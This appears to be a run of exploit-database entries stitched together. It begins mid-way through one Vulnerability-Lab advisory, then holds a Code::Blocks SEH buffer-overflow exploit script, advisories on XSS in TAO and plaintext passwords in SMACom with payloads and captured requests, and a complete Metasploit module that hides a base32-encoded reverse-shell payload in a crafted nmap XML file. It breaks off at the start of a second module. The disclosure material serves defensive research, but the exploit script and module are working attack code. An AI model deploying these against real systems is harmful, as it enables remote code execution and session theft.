Content-Disposition: form-data; name="file"; filename="clay.js.jpg"
-
Status: 200[OK]
GET http://localhost/listVideosJson
Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[87]
-
Status: 200[OK]
GET http://localhost/vid/clay.js.jpg
Mime Type[application/iosjpg]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost/]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[86670]
      Content-Type[application/iosjpg;]
-
Status: 200[OK]
GET http://localhost/vid/clay.js
Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[0]


Solution - Fix & Patch:
=======================
1.1
The vulnerability can be resolved by a restriction and parse of the
filename parameter. Disallow special chars and restrict inputs.
Encode also the output locations to ensure nobody is able to execute
script code in the main file listing.

1.2
Parse the filename for multiple extensions and prevent that attackers
open specific dangerous file extensions that could
compromise the local application path.


Security Risk:
==============
1.1
The security risk of the script code injection web vulnerability in the
mobile ios application is estimated as high.

1.2
The security risk of the arbitrary file upload vulnerability in the
mobile ios application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
# Date: 2020-04-17
# Exploit Author: T3jv1l
# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe
# Software version: 16.01


buffer="A"*536  #buffer
buffer+="\x61\x41"  #POPAD + Aligned
buffer+="\xF2\x41"  #POP/POP/RET

#----------------------Align the eax to point to the shellcode PART -----------------------
#buffer+="\x90"  #NOP
#buffer+="\x6e"  #venetian padding
#buffer+="\x05\x37\x13"  #add eax, 0x13003700
#buffer+="\x6e"
#buffer+="\x2d\x36\x13"  #sub eax, 0x13003600
#buffer+="\x6e"  #venetian padding
#buffer+="\x50"  #push eax
#buffer+="\x6e"  #Venetian padding
#buffer+="\xc3"  #ret

#----------------------Shellcode PlaceHOLDER ----------------------------------------------
#uffer+="\x90"*111
#buffer+=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIX52KPKPM01PDIJEP1Y0QT4KPPNPTK1BLLTK1BMDDKSBNHLO6WPJNFNQKOVLOLC13LM2NLO07QXOLMKQ7WJBZR220WDKQBN0TKOZOLTKPLN1T8ZCOXKQZ10QTKQIMPKQXSTKOYLXISOJ19TKNTTKM1XV01KOFL7Q8OLMKQGW08YPD5L6KSSMJXOKSMMTBU9TPXDKR8MTKQYCRF4KLLPKTKPXMLKQJ3TKKTDKKQZ0E9OTMTO4QK1K1Q291JPQKO9PQOQOQJTKN2JKDM1MRJKQ4M3UGBKPM0M0R0RHNQTKRO4GKOXUWKL0VU6BPVQXVFDU7MUMKO9EOLM63LLJE0KKYP2UM5WKOWN3T2RORJKP1CKOJ5BCS1RL33NNS5RX2EKPA")
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x90"*(5000-len(buffer))
f=open('exploit.m3u','w');
f.write(buffer);
f.close();
print "[+] File created."

Document Title:
===============
TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web
Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2215


Release Date:
=============
2020-04-16


Vulnerability Laboratory ID (VL-ID):
====================================
2215


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Accelerating innovation in digital assessment. The TAO assessment
platform gives you the freedom, control, and
support to evolve with today's learners. For organizations who want the
freedom to control their assessment
software – from authoring to delivery to reporting.

(Copy of the Homepage: https://www.taotesting.com/product/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
cross site vulnerabilities in the TAO Open Source Assessment Platform
v3.3.0 RC02.


Affected Product(s):
====================
Product: TAO Open Source Assessment Platform v3.3.0 RC02


Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
A html injection web vulnerability has been discovered in the TAO Open
Source Assessment Platform v3.3.0 RC02 web-application.
The vulnerability allows remote attackers to inject own malicious html
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.

The html inject web vulnerability is located in the `userFirstName`,
`userLastName`, `userMail`, `password2`, and `password3`
parameters of the user account input field. The request method to inject
is POST and the attack vector is application-side.
Remote attackers are able to inject html code for the user account
credentials to provoke an execution within the main manage
user listing.

Successful exploitation of the web vulnerability results in persistent
phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Users

Vulnerable Parameter(s):
[+] userFirstName
[+] userLastName
[+] userMail
[+] password2
[+] password3



1.2
Multiple persistent cross site web vulnerabilities has been discovered
in the TAO Open Source Assessment Platform v3.3.0 RC02.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent vulnerability is located in the content parameter of the
Rubric Block (Add) module. Attackers are able to inject own malicious
script code inside of the rubric name value. The attached values will be
redisplayed in the frontend of tao. The request method to inject is
POST and the attack vector is located on the application-side. The
injection point is the Rubric Block (Add) module and the execution occurs
in the frontend panel when listing the item attribute.

Successful exploitation of the web vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Rubric Block (Add)

Vulnerable Parameter(s):
[+] content


Proof of Concept (PoC):
=======================
1.1
The persistent html injection web vulnerability can be exploited by
remote attackers with privileged user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install the application and open the ui
2. Move on top right to the user button and click manage users
3. Inject html script code payload into the vulnerable input fields
4. Save the entry
5. Open to the manage users listing
Note: The payloads executes in the table that shows the user account
values for admins
6. Successful reproduce of the html inject vulnerability!


PoC: Vulnerable Source (Manage Users)
<th class="actions">Actions</th>
</tr></thead>
<tbody>
<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539">
<td class="login"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="firstname"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="lastname"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="email"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="roles">Test Taker</td>
<td class="guiLg">German</td>
<td class="status"><span class="icon-result-ok"></span> enabled</td>


--- PoC Session Logs (POST) ---
http://localhost:89/tao/Users/edit
Host: localhost:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept: text/html, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1393
Origin: http://localhost:89
Connection: keep-alive
Referer:
http://localhost:89/tao/Main/index?structure=users&ext=tao&section=edit_user
Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj;
tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004
user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_
rdf-schema_3_label=<img
src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img
src="https://www.evolution-sec.com/evosec-logo.png">
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img
src="https://www.evolution-sec.com/evosec-logo.png">
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img
src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca&
http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole&
classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539
&password2=<img src="https://www.evolution-sec.com/evosec-logo.png">
&password3=<img src="https://www.evolution-sec.com/evosec-logo.png">
-
POST: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Win32) PHP/7.2.15
X-Powered-By: PHP/7.2.15
Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Reference(s):
http://localhost:89/tao/Users/edit
http://localhost:89/tao/Main/index



1.2
The persistent cross site scripting web vulnerability can be exploited
by remote attackers with privileged user account with low user interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open and login to the tao application
2. Move into the test module on top
3. Add new Rubric Block
4. Inject script code test payload into the text label content input field
5. Save the entry and move on the right site to activate
6. The click on activate includes and executes the content immediatly
7. Succesful reproduce of the cross site scripting vulnerability!


PoC: Vulnerable Source
<div class="rubricblock-content"><div>asd>"><span
data-serial="img_l9lmylhuv8hf55xo9z264n"
class="widget-box widget-inline widget-img" data-qti-class="img"
contenteditable="false">
<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img"
src="" alt="" style=""
width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3"
data-qti-class="img" src="evil.source" alt="" style="">&nbsp;
>"<script>alert(document.cookie)></script></div></iframe></div></div>
</li></ol>


PoC: Payload
"<script>alert(document.cookie)></script>


--- PoC Session Logs [POST] ---
http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612
Host: localhost:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9664
Origin: http://localhost:89
Connection: keep-alive
Referer:
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests&section=authoring
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI
Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[],
"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[],
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false,
"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
1","visible":true,
"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[],
"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,
"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[],
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses":
false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true,
"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef",
"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},
{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[],
"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl
":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories"
:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[],
"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":
"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6",
"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>",
"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"},
"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No
outcome processing.
Erase the existing rules, if
any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}}
-
POST: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Win32) PHP/7.2.15
X-Powered-By: PHP/7.2.15
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: frame-ancestors 'self'
Content-Length: 14
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
-
http://localhost:89/tao/Main/evil.source
Host: localhost:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests&section=authoring
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Win32) PHP/7.2.15
X-Powered-By: PHP/7.2.15
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 169
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Security Risk:
==============
1.1
The security risk of the html inject web vulnerability in the
web-application is estimated as medium.

1.2
The security risk of the persistent cross site scripting web
vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Document Title:
===============
SMACom v1.2.0 - Insecure Session Validation Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2211


Release Date:
=============
2020-04-16


Vulnerability Laboratory ID (VL-ID):
====================================
2211


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Class:
====================
Insufficient Session Validation


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
You do not need an USB cable anymore to transfer your photos and movies
to a PC! SMACom Wi-Fi photo Transfer is software
that transfers your photos and movies taken by a smart phone to your PC
without using an USB cable or a SD Card. You can also
transfer the data from a PC to a smart phone.

(Copy of the Homepage:
https://apps.apple.com/us/app/smacom-wi-fi-photo-transfer-send-image-movie-to-pc/id966802453
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an insecure
session validation vulnerability in the SMACom v1.2.0 mobile ios
web-application.


Affected Product(s):
====================
MEDIA NAVI Inc.
Product: SMACom v1.2.0 - Apple iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
An insecure session validation web vulnerability has been discovered in
the official SMACom v1.2.0 mobile ios web-application.
The vulnerability becomes visible through insecure transmitted session
credentials like passwords or keys.

The vulnerability is located in the session handling of the `password`
authentication parameter of the wifi photo transfer module.
Users can setup there pin for authentication to access the wifi user
interface. The web-server is not secured by ssl and transmits
the `password` for the wifi authentication in plain-text. Remote
attackers with network access privileges or on public wifis access
are able to read the authentication credentials and followup requests
with the password via man in the middle attack. The password
is transmitted as plain-text and is used in the visible session
parameter requested on each GET index attempt.

Next to that we want to mention as well that the authentication is not
protected against any bruteforce attempts which allowed us
to quickly crack any 4-6 digits pins from the default generator within
minutes.

Successful exploitation of the vulnerability results in mobile wifi
application file-system compromise and information leaks.

Request Method(s):
[+] GET

Vulnerable Function(s):
[+] Auth

Vulnerable Module(s):
[+] password


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with network
access without privileged application user account.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.


PoC: Captured Requests with Password
200 OK http://localhost:8080/Image?password=[SCORE HERE!]
200 OK
http://localhost:8080/?action=getcontent&contentid=3EDCAB95-2264-464C-B5E1-CCEC6D2BD5F4.PNG&kind=Image&password=[SCORE
HERE!]
200 OK
http://localhost:8080/?action=getcontent&contentid=8F784C0F-C1F8-4B36-930B-4C99B291E900.mp4&kind=Movie&password=[SCORE
HERE!]


Reference(s):
http://localhost:8080/Image?password=
http://localhost:8080/?action=getcontent&contentid=8F784C0F-C1F8-4B36-930B-4C99B291E900.mp4&kind=Movie&password=
http://localhost:8080/?action=getcontent&contentid=3EDCAB95-2264-464C-B5E1-CCEC6D2BD5F4.PNG&kind=Image&password=


Security Risk:
==============
The security risk of the insecure session validation web vulnerability
in the mobile ios web application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
'Description'    => %q(
        This module exploits a shell command injection vulnerability in the
        libnotify plugin. This vulnerability affects Metasploit versions
        5.0.79 and earlier.
      ),
'DisclosureDate' => 'Mar 04 2020',
'License'        => GPL_LICENSE,
'Author'         =>
                        [
'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
                        ],
'References'     =>
                        [
                          [ 'CVE', '2020-7350' ],
                          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
                        ],
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Payload'        =>
                        {
'DisableNops' => true
                        },
'DefaultOptions' =>
                        {
'PAYLOAD' => 'cmd/unix/reverse_python'
                        },
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c "import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))"&; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)

    print_status "Writing xml file: #{datastore['FILENAME']}"
    file_create xml
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  Rank = ExcellentRanking
  def initialize(info = {})
    super(
